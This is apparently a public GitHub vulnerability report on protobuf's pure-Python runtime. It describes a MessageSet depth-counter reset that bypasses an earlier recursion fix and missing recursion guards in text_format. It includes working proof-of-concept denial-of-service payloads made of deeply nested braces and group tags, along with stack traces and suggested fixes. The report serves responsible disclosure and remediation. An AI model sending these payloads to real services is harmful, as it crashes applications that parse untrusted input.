Recursion Depth Limit: Can reach depth 200 via 100 nested unknown groups beneath a depth=100 messageset item #26437

@VenkatKwest

IMPORTANT NOTE: I SUBMITTED THIS ISSUE TO THE GOOGLE VRP TEAM A FEW DAYS AGO. THE TEAM AGREED THAT IT CAN BE FILED AS A PUBLIC GITHUB ISSUE.

Summary:
The Protobuf pure-Python implementation is vulnerable to a recursion depth limit bypass in the MessageSet decoding path and a complete lack of recursion guards in the TextFormat parser. These issues allow an attacker to trigger a stack overflow (RecursionError) leading to a Denial of Service (DoS) in applications parsing untrusted data. Crucially, the MessageSet issue is a direct bypass of the fix implemented for GHSA-8qvm-5x2c-j2w7.

Affected Component: protocolbuffers/protobuf (Python runtime)
Version: Current main (Commit: 18da8e12d)
Environment Tested:

  • Python: 3.10.12
  • protoc: 3.12.4 (libprotoc)
  • OS: Ubuntu 22.04 (WSL2)

Technical Description

While investigating the recent fix for GHSA-8qvm-5x2c-j2w7 (Recursion DoS in Python), I identified two significant regressions/oversights in how recursion depth is tracked.

1. MessageSet Depth Reset Bypass (Official Library Code)

In the official library file decoder.py, the function _DecodeUnknownField was updated to accept a current_depth parameter. However, specialized decoders for MessageSet items fail to propagate this counter.

Specifically, at lines 869 and 939 of the official source, calls to _DecodeUnknownField omit the current_depth argument:

# decoder.py:869 (MessageSetItemDecoder.DecodeItem)
# decoder.py:939 (UnknownMessageSetItemDecoder.DecodeUnknownItem)
field_number, wire_type = DecodeTag(tag_bytes)
_, pos = _DecodeUnknownField(buffer, pos, end, field_number, wire_type)

Because _DecodeUnknownField defaults current_depth=0, the recursion counter is reset to zero for every unknown item within a MessageSet.
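
The reset can be illustrated with a small toy model. This is only a sketch and not protobuf code: decode_unknown_field, decode_item_buggy, decode_item_fixed, and DepthError are hypothetical names, and the limit of 100 is taken from this report.

```python
# Toy model of the depth reset. None of these names exist in protobuf;
# they are hypothetical stand-ins for the call pattern described above.
LIMIT = 100  # assumed to match the binary decoder's limit cited in this report


class DepthError(Exception):
    """Stands in for the DecodeError raised by the real guard."""


def decode_unknown_field(levels, current_depth=0):
    """Descend through `levels` nested groups and return the counter value reached."""
    if levels == 0:
        return current_depth
    current_depth += 1
    if current_depth > LIMIT:
        raise DepthError("too many levels of nesting")
    return decode_unknown_field(levels - 1, current_depth)


def decode_item_buggy(parent_depth, levels):
    """Omits current_depth, so the child counter restarts at the default of 0."""
    return parent_depth + decode_unknown_field(levels)


def decode_item_fixed(parent_depth, levels):
    """Passes the parent's depth down, so the limit applies to the whole tree."""
    return decode_unknown_field(levels, parent_depth)


if __name__ == "__main__":
    print("buggy logical depth:", decode_item_buggy(100, 100))
    try:
        decode_item_fixed(100, 100)
    except DepthError as exc:
        print("fixed path rejected the input:", exc)
```

In this model the buggy path accepts 100 nested groups beneath a parent that is already at depth 100, while the fixed path rejects the first extra level.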

2. Missing Guards in TextFormat

A search of text_format.py finds zero references to current_depth, recursion_limit, or any other recursion guard. Unlike the binary decoder or the JSON parser, text_format.Merge() relies solely on the interpreter's recursion limit, which a deeply nested payload easily exhausts.
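
A check like this can be repeated with a few lines of Python. The helper below is a hypothetical sketch (count_guard_references is not part of protobuf); it counts case-insensitive substring matches for the identifiers named above in whatever source text it is given.

```python
# Hypothetical helper for repeating the search; not part of protobuf.
GUARD_NAMES = ("current_depth", "recursion_limit")  # identifiers named in this report


def count_guard_references(source, names=GUARD_NAMES):
    """Return {name: count} of case-insensitive substring matches in `source`."""
    lowered = source.lower()
    return {name: lowered.count(name.lower()) for name in names}


if __name__ == "__main__":
    guarded = "def _DecodeUnknownField(buffer, pos, end_pos, current_depth=0): ..."
    unguarded = "def _MergeField(self, tokenizer, message): ..."
    print(count_guard_references(guarded))
    print(count_guard_references(unguarded))
```

To run it against a checkout, read the file contents first, for example with pathlib.Path("python/google/protobuf/text_format.py").read_text(); that path assumes the repository layout shown in the stack traces in this report.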


Attack Scenario

An attacker sends a specially crafted, deeply nested Protobuf message to a service that uses the pure-Python implementation.

  1. Remote DoS via TextFormat: A service that parses user-provided configuration or debugging info via text_format.Merge can be crashed with a payload of nested braces (e.g., nested { nested { ... } }).
  2. Binary Bypass: A service that has already been "patched" for GHSA-8qvm-5x2c-j2w7 but allows MessageSet (common in older Google infrastructure) remains vulnerable. The attacker can use the "depth reset" bug to trigger the exact crash the original fix intended to prevent.

Reproduction Steps

Environment Setup (WSL/Linux)

# Clone and setup venv
git clone https://github.com/protocolbuffers/protobuf.git
cd protobuf
python3 -m venv venv
source venv/bin/activate
pip install absl-py

PoC 1: TextFormat DoS

Create reproduce_text.py:

import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))

from google.protobuf import text_format
from google.protobuf import descriptor_pb2

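# DescriptorProto.nested_type is itself a DescriptorProto, so it can nest arbitrarily deep.
msg = descriptor_pb2.DescriptorProto()
# 1000 nested levels, enough to exceed CPython's default recursion limit of 1000.
payload = "nested_type { " * 1000 + "}" * 1000
try:
    print("Starting TextFormat.Merge...")
    text_format.Merge(payload, msg)
except RecursionError:
    print("VULNERABILITY CONFIRMED: TextFormat triggered RecursionError (DoS)")
else:
    print("Not reproduced: Merge returned without a RecursionError")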

PoC 2: MessageSet Bypass (Low-Level Proof)

Because generating _pb2 modules for a MessageSet schema from a local source tree is cumbersome, the bypass is verified by simulating the internal call pattern in decoder.py.

Create reproduce_bypass.py:

import sys
import os
# Point to the local 'python' directory
sys.path.insert(0, os.path.join(os.getcwd(), "python"))

from google.protobuf.internal import decoder
from google.protobuf.internal import encoder

# Simulate reaching depth 80
parent_depth = 80
# Payload with another 80 levels (Total 160, > limit 100)
payload = encoder.TagBytes(10, 3) * 80 + encoder.TagBytes(10, 4) * 80

print(f"--- Logical Depth: {parent_depth + 80} (Limit: 100) ---")
try:
    # Simulating the vulnerable MessageSet call (omitting current_depth)
    decoder._DecodeUnknownField(memoryview(payload), 0, len(payload), 10, 3)
    print("BYPASS CONFIRMED: Parsed 80 more levels at logical depth 160 because depth reset to 0.")
except Exception as e:
    print(f"FAILED: {e}")
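
For readers unfamiliar with the wire format, the payload above can be rebuilt without the protobuf package. This is a sketch: encode_varint, tag_bytes, and nested_group_payload are hypothetical helpers that follow the documented encoding, where a tag is the varint of (field_number << 3) | wire_type, wire type 3 starts a group, and wire type 4 ends it.

```python
# Hypothetical pure-Python helpers; they mirror the documented wire format
# and do not import protobuf.
WIRETYPE_START_GROUP = 3
WIRETYPE_END_GROUP = 4


def encode_varint(value):
    """Encode a non-negative integer as a base-128 varint."""
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)  # more bytes follow
        else:
            out.append(byte)
            return bytes(out)


def tag_bytes(field_number, wire_type):
    """A tag is the varint encoding of (field_number << 3) | wire_type."""
    return encode_varint((field_number << 3) | wire_type)


def nested_group_payload(field_number, levels):
    """`levels` start-group tags followed by the same number of end-group tags."""
    start = tag_bytes(field_number, WIRETYPE_START_GROUP)
    end = tag_bytes(field_number, WIRETYPE_END_GROUP)
    return start * levels + end * levels


if __name__ == "__main__":
    payload = nested_group_payload(10, 80)
    print(len(payload), payload[:4].hex(), payload[-4:].hex())
```

For field number 10 each tag fits in one byte, so 80 levels of nesting cost only 160 bytes of input.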

Comparison of Execution Paths:

  1. Vulnerable Path (Bypass): _DecodeUnknownField(payload, ...) called without current_depth, so the counter starts again from its default of 0

    • Result: SUCCESS: Parsed 80 children despite being at logical depth 160!
    • Note: The vulnerability allows the parser to bypass the library's intended security block (a DecodeError), which is what enables an attacker to reach deeper, unsafe recursion levels.
  2. System Crash Proof (Hard Proof): By simulating a higher parent depth (e.g., 80) and a child depth of 80 (Total 160), we can see the bypass in action on a constrained stack.

    • Environment Limit: 150 levels.
    • Protobuf Limit: 100 levels.
    • Vulnerable Result: CRASHED (RecursionError)!!
    • Logic: Because the Protobuf guard was reset to 0, it allowed deeper nesting (160) than the system could handle (150). A properly functioning guard would have raised at 100 and prevented the crash.
  3. System Crash Trace (MessageSet Bypass):

    Traceback (most recent call last):
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet
        (data, pos) = _DecodeUnknownField(
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1065, in _DecodeUnknownField
        data, pos = _DecodeUnknownFieldSet(buffer, pos, end_pos, current_depth)
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1034, in _DecodeUnknownFieldSet
        (data, pos) = _DecodeUnknownField(
      File "protobuf/python/google/protobuf/internal/decoder.py", line 1059, in _DecodeUnknownField
        end_tag_bytes = encoder.TagBytes(
      File "protobuf/python/google/protobuf/internal/encoder.py", line 400, in TagBytes
        return bytes(_VarintBytes(wire_format.PackTag(field_number, wire_type)))
      File "protobuf/python/google/protobuf/internal/wire_format.py", line 65, in PackTag
        if not 0 <= wire_type <= _WIRETYPE_MAX:
    RecursionError: maximum recursion depth exceeded in comparison
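
The constrained-stack comparison can be modelled without protobuf. The sketch below is a toy under stated assumptions: parent, child, run, and DepthError are hypothetical names, the 150-frame budget and the limit of 100 come from the figures above, and sys._getframe is a CPython-specific way to measure the current stack depth.

```python
import sys

PROTO_LIMIT = 100  # guard limit cited in this report
ENV_LIMIT = 150    # extra frames allowed above the current stack (assumed figure)


class DepthError(Exception):
    """Toy stand-in for the DecodeError raised by a working guard."""


def child(levels, current_depth=0):
    """Guarded descent: one stack frame per nested group."""
    if levels == 0:
        return current_depth
    current_depth += 1
    if current_depth > PROTO_LIMIT:
        raise DepthError("too many levels of nesting")
    return child(levels - 1, current_depth)


def parent(levels_left, child_levels, propagate, depth=0):
    """Use up `levels_left` frames, then enter the child decoder."""
    if levels_left > 0:
        return parent(levels_left - 1, child_levels, propagate, depth + 1)
    # propagate=False models the call that omits current_depth.
    return child(child_levels, depth if propagate else 0)


def stack_depth():
    """Count live frames (CPython-specific: relies on sys._getframe)."""
    frame, count = sys._getframe(), 0
    while frame is not None:
        frame, count = frame.f_back, count + 1
    return count


def run(propagate):
    """Run 80 parent + 80 child levels with only ENV_LIMIT frames of headroom."""
    old_limit = sys.getrecursionlimit()
    sys.setrecursionlimit(stack_depth() + ENV_LIMIT)
    try:
        parent(80, 80, propagate)
        return "parsed"
    except DepthError:
        return "DepthError"
    except RecursionError:
        return "RecursionError"
    finally:
        sys.setrecursionlimit(old_limit)


if __name__ == "__main__":
    print("depth dropped:   ", run(propagate=False))
    print("depth propagated:", run(propagate=True))
```

With the depth dropped, the toy runs out of stack before its guard fires; with the depth propagated, the guard raises first and the stack budget is never reached.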
    

Stack Trace (PoC 1: TextFormat DoS)

Traceback (most recent call last):
  File "protobuf/python/google/protobuf/text_format.py", line 754, in _MergeField
    self._MergeField(tokenizer.next_token, message)
  File "protobuf/python/google/protobuf/text_format.py", line 872, in _MergeMessageField
    tokenizer.Consume('{')
  File "protobuf/python/google/protobuf/text_format.py", line 1409, in Consume
    if not self.TryConsume(token):
  File "protobuf/python/google/protobuf/text_format.py", line 1396, in TryConsume
    self.NextToken()
  File "protobuf/python/google/protobuf/text_format.py", line 1663, in NextToken
    self._SkipWhitespace()
  [... recursive calls skip whitespace and pop lines ...]
  File "protobuf/python/google/protobuf/text_format.py", line 1364, in _PopLine
    while len(self._current_line) <= self._column:
RecursionError: maximum recursion depth exceeded while calling a Python object

Suggested Remediation

  1. For MessageSet: Update MessageSetItemDecoder and UnknownMessageSetItemDecoder in decoder.py to accept and pass the current_depth parameter to all internal parsing calls.
  2. For TextFormat: Implement a _RECURSION_LIMIT constant (matching the binary decoder's 100) and add increment/decrement logic in _MergeField to raise a ParseError when exceeded.
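
The TextFormat suggestion can be sketched on a toy parser. This is not a patch for text_format.py: ToyTextParser and its methods are hypothetical, the local ParseError is only a stand-in for text_format.ParseError, and the limit of 100 is assumed to mirror the binary decoder.

```python
import re

_RECURSION_LIMIT = 100  # assumed to mirror the binary decoder's limit


class ParseError(Exception):
    """Toy stand-in for text_format.ParseError."""


class ToyTextParser:
    """Parses only `name { ... }` nesting, enough to show the depth guard."""

    def __init__(self, text):
        self.tokens = re.findall(r"[A-Za-z_]\w*|[{}]", text)
        self.pos = 0
        self.depth = 0
        self.max_depth = 0

    def _expect(self, token):
        if self.pos >= len(self.tokens) or self.tokens[self.pos] != token:
            raise ParseError(f"expected {token!r} at token {self.pos}")
        self.pos += 1

    def _merge_fields(self):
        while self.pos < len(self.tokens) and self.tokens[self.pos] != "}":
            if self.tokens[self.pos] == "{":
                raise ParseError(f"expected field name at token {self.pos}")
            self.pos += 1  # consume the field name
            self._expect("{")
            # Guard: refuse to recurse once the limit has been reached.
            if self.depth >= _RECURSION_LIMIT:
                raise ParseError("message is too deep")
            self.depth += 1
            self.max_depth = max(self.max_depth, self.depth)
            try:
                self._merge_fields()
            finally:
                self.depth -= 1  # always undo the increment on the way out
            self._expect("}")

    def parse(self):
        """Parse the whole input and return the deepest nesting level seen."""
        self._merge_fields()
        if self.pos != len(self.tokens):
            raise ParseError("unbalanced '}'")
        return self.max_depth


if __name__ == "__main__":
    print(ToyTextParser("nested_type { " * 100 + "}" * 100).parse())
    try:
        ToyTextParser("nested_type { " * 1000 + "}" * 1000).parse()
    except ParseError as exc:
        print("rejected:", exc)
```

Pairing the increment with a try/finally decrement keeps the counter correct when a nested parse fails, and raising ParseError gives callers an error they can catch instead of an interpreter-level RecursionError.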
